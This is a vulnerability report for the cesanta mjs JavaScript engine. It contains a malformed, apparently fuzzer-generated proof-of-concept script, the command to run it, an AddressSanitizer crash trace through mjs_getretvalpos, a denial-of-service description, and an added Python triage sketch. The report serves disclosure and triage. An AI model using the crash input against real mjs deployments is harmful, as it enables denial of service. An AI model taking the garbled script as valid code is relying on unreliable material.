poc
````
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;
for (i = 8; i < 20; i++) {
a let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify+= i;
c /= 0, c } 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify(o)AAA
````
run command
````
mjs -f poc
````
ASAN info
````
AddressSanitizer:DEADLYSIGNAL
=================================================================
==184==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7ff84edb0535 bp 0x7ffea0260498 sp 0x7ffea0260498 T0)
==184==The signal is caused by a READ memory access.
==184==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used.
    #0 0x7ff84edb0535 in vasprintf /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57
    #1 0x7ff84ed8d113 in asprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/asprintf.c:35
    #2 0x7ff84ed58353 in __assert_fail_base /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:57
    #3 0x7ff84ed58471 in __assert_fail /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:101
    #4 0x4eeb98 in mjs_getretvalpos (/mjs/mjs+0x4eeb98)
    #5 0x4eebe5 in mjs_arg (/mjs/mjs+0x4eebe5)
    #6 0x4ec5e8 in mjs_op_json_stringify (/mjs/mjs+0x4ec5e8)
    #7 0x4ef755 in mjs_exec_internal (/mjs/mjs+0x4ef755)
    #8 0x4efa40 in mjs_exec_file (/mjs/mjs+0x4efa40)
    #9 0x4f75b9 in main (/mjs/mjs+0x4f75b9)
    #10 0x7ff84ed49c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    #11 0x41b7f9 in _start (/mjs/mjs+0x41b7f9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57 in vasprintf
==184==ABORTING
````
The name of an affected Product: mjs
The affected version: Commit: b1b6eac (Tag: 2.20.0)
Description: An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_getretvalpos function in the mjs.c file.
Vulnerability Type: segmentation violation
Environment
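For triage: the ASAN summary line in this report attributes the fault to `vasprintf`, while frames #2 to #4 show it was reached through `__assert_fail` called from `mjs_getretvalpos`. The Python sketch below is an added example (not part of the original report or the mjs project) that buckets the report by its first non-libc frames; treating `/build/glibc-` paths as runtime frames is an assumption that fits this trace, and the function names `parse_frames` and `triage` are hypothetical.

```python
import re

# Top of the stack, copied from the ASAN report on this page.
REPORT = """\
==184==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7ff84edb0535 bp 0x7ffea0260498 sp 0x7ffea0260498 T0)
#0 0x7ff84edb0535 in vasprintf /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57
#1 0x7ff84ed8d113 in asprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/asprintf.c:35
#2 0x7ff84ed58353 in __assert_fail_base /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:57
#3 0x7ff84ed58471 in __assert_fail /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:101
#4 0x4eeb98 in mjs_getretvalpos (/mjs/mjs+0x4eeb98)
#5 0x4eebe5 in mjs_arg (/mjs/mjs+0x4eebe5)
#6 0x4ec5e8 in mjs_op_json_stringify (/mjs/mjs+0x4ec5e8)
#7 0x4ef755 in mjs_exec_internal (/mjs/mjs+0x4ef755)
"""

# "#N 0xPC in function location", where location is either a source path
# or "(module+0xoffset)" for frames without debug info.
FRAME = re.compile(
    r"^[ \t]*#(\d+)\s+0x[0-9a-f]+\s+in\s+(\S+)\s+\(?(.+?)\)?[ \t]*$", re.M
)
ASSERT_FUNCS = {"__assert_fail", "__assert_fail_base"}
RUNTIME_PREFIX = "/build/glibc-"  # assumption: libc frames carry this build path


def parse_frames(report):
    """Return [(index, function, location), ...] in stack order."""
    return [(int(n), func, loc) for n, func, loc in FRAME.findall(report)]


def triage(report, depth=3):
    """Bucket a report by its first `depth` application (non-libc) frames."""
    frames = parse_frames(report)
    app = [func for _, func, loc in frames if not loc.startswith(RUNTIME_PREFIX)]
    # A stack that passes through __assert_fail is a failed assert() in the
    # calling frame, even if the process later faults inside libc.
    kind = "assert" if any(func in ASSERT_FUNCS for _, func, _ in frames) else "crash"
    return {
        "kind": kind,
        "top": app[0] if app else None,
        "bucket": kind + ":" + "<".join(app[:depth]),
    }


if __name__ == "__main__":
    print(triage(REPORT))
```

Bucketing on the application frames keeps this report separate from unrelated crashes that also end in `vasprintf`.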